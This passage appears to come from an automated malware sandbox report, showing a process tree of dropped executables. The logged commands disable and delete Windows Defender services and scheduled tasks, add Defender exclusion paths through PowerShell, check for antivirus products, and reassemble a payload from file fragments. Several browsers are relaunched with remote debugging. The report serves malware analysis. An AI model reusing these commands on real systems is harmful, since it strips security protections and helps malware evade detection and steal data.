                                            sc delete "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:1536
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                            8⤵
                                              PID:5472
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2088
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:3460
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                              8⤵
                                                PID:680
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:2484
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:4044
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                8⤵
                                                  PID:2592
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                  8⤵
                                                    PID:5740
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                    8⤵
                                                      PID:3944
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                      8⤵
                                                        PID:4208
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                        8⤵
                                                          PID:5248
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:604
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:5672
                                              • C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10427600101\amnew.exe"
                                                3⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                PID:3692
                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                  4⤵
                                                  • Downloads MZ/PE file
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3536
                                                  • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:956
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      6⤵
                                                      • Downloads MZ/PE file
                                                      • System Location Discovery: System Language Discovery
                                                      • Checks processor information in registry
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1448
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                        7⤵
                                                        • Uses browser remote debugging
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:2732
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffad779dcf8,0x7ffad779dd04,0x7ffad779dd10
                                                          8⤵
                                                            PID:5696
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2192 /prefetch:3
                                                            8⤵
                                                              PID:1144
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2008,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2004 /prefetch:2
                                                              8⤵
                                                                PID:3280
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2396 /prefetch:8
                                                                8⤵
                                                                  PID:5700
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3256,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3320 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:1508
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3340 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:1824
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4296,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4324 /prefetch:2
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:2024
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4604,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4652 /prefetch:1
                                                                  8⤵
                                                                  • Uses browser remote debugging
                                                                  PID:5508
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5204,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5216 /prefetch:8
                                                                  8⤵
                                                                    PID:1272
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5504,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5528 /prefetch:8
                                                                    8⤵
                                                                      PID:2532
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5292,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5280 /prefetch:8
                                                                      8⤵
                                                                        PID:4312
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5728,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5716 /prefetch:8
                                                                        8⤵
                                                                          PID:4044
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5252,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5864 /prefetch:8
                                                                          8⤵
                                                                            PID:5356
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,18016766328629263893,871705752587099611,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:8
                                                                            8⤵
                                                                              PID:5380
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                            7⤵
                                                                            • Uses browser remote debugging
                                                                            • Enumerates system info in registry
                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:3372
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x210,0x7ffad777f208,0x7ffad777f214,0x7ffad777f220
                                                                              8⤵
                                                                                PID:3144
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2204,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:2
                                                                                8⤵
                                                                                  PID:3068
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:3
                                                                                  8⤵
                                                                                    PID:1296
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2504,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=2668 /prefetch:8
                                                                                    8⤵
                                                                                      PID:5876
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3556,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:1
                                                                                      8⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:1508
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3576,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
                                                                                      8⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:4540
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5052,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=5048 /prefetch:1
                                                                                      8⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:3700
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5084,i,1708500656886647459,7120185276725356858,262144 --variations-seed-version --mojo-platform-channel-handle=4932 /prefetch:1
                                                                                      8⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:5504
                                                                                  • C:\ProgramData\lxt00zm7y5.exe
                                                                                    "C:\ProgramData\lxt00zm7y5.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:3104
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      8⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4484
                                                                                  • C:\ProgramData\0rqi589z58.exe
                                                                                    "C:\ProgramData\0rqi589z58.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:2100
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      8⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5920
                                                                                      • C:\Users\Admin\AppData\Roaming\h915aBq0E5.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\h915aBq0E5.exe"
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5552
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                          10⤵
                                                                                            PID:15724
                                                                                        • C:\Users\Admin\AppData\Roaming\CjwdalZkEQ.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\CjwdalZkEQ.exe"
                                                                                          9⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3664
                                                                                    • C:\ProgramData\ymo8gva1vk.exe
                                                                                      "C:\ProgramData\ymo8gva1vk.exe"
                                                                                      7⤵
                                                                                        PID:1300
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1vSU580j\lRDjoS0Ybg8uND8V.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\1vSU580j\lRDjoS0Ybg8uND8V.exe 0
                                                                                          8⤵
                                                                                            PID:4692
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1vSU580j\79IS1lsndyJmiink.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\1vSU580j\79IS1lsndyJmiink.exe 4692
                                                                                              9⤵
                                                                                                PID:1460
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 644
                                                                                                  10⤵
                                                                                                  • Program crash
                                                                                                  PID:18988
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 932
                                                                                                9⤵
                                                                                                • Program crash
                                                                                                PID:15732
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\xt2db" & exit
                                                                                            7⤵
                                                                                              PID:5976
                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                timeout /t 11
                                                                                                8⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:15624
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4696
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                            6⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4436
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3196
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                            6⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1068
                                                                                          • C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                            C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4976
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
                                                                                              7⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4104
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4268
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                            6⤵
                                                                                              PID:5508
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              6⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:1860
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10046340101\a29574c265.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10046340101\a29574c265.exe"
                                                                                            5⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Windows directory
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:3040
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
                                                                                              6⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3724
                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                tasklist
                                                                                                7⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4576
                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                findstr /I "opssvc wrsa"
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1144
                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                tasklist
                                                                                                7⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1784
                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:6044
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c md 674187
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1672
                                                                                              • C:\Windows\SysWOW64\extrac32.exe
                                                                                                extrac32 /Y /E Funky.wbk
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5784
                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                findstr /V "Und" Tournament
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2248
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3436
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1824
                                                                                              • C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
                                                                                                Constraints.com r
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:2368
                                                                                              • C:\Windows\SysWOW64\choice.exe
                                                                                                choice /d y /t 5
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5392
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:3904
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              6⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:1204
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10049540101\959b19dde6.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10049540101\959b19dde6.exe"
                                                                                            5⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:920
                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\10049540101\959b19dde6.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2228
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10049550101\f0c35b61ae.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10049550101\f0c35b61ae.exe"
                                                                                            5⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1372
                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\10049550101\f0c35b61ae.exe"
                                                                                              6⤵
                                                                                                PID:15528
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428230101\060787c2b1.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428230101\060787c2b1.exe"
                                                                                          3⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Identifies Wine through registry keys
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1904
                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10428230101\060787c2b1.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5744
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428240101\93de04080d.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10428240101\93de04080d.exe"
                                                                                          3⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Identifies Wine through registry keys
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4556
                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10428240101\93de04080d.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:3584
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10428250101\dc9813e710.exe
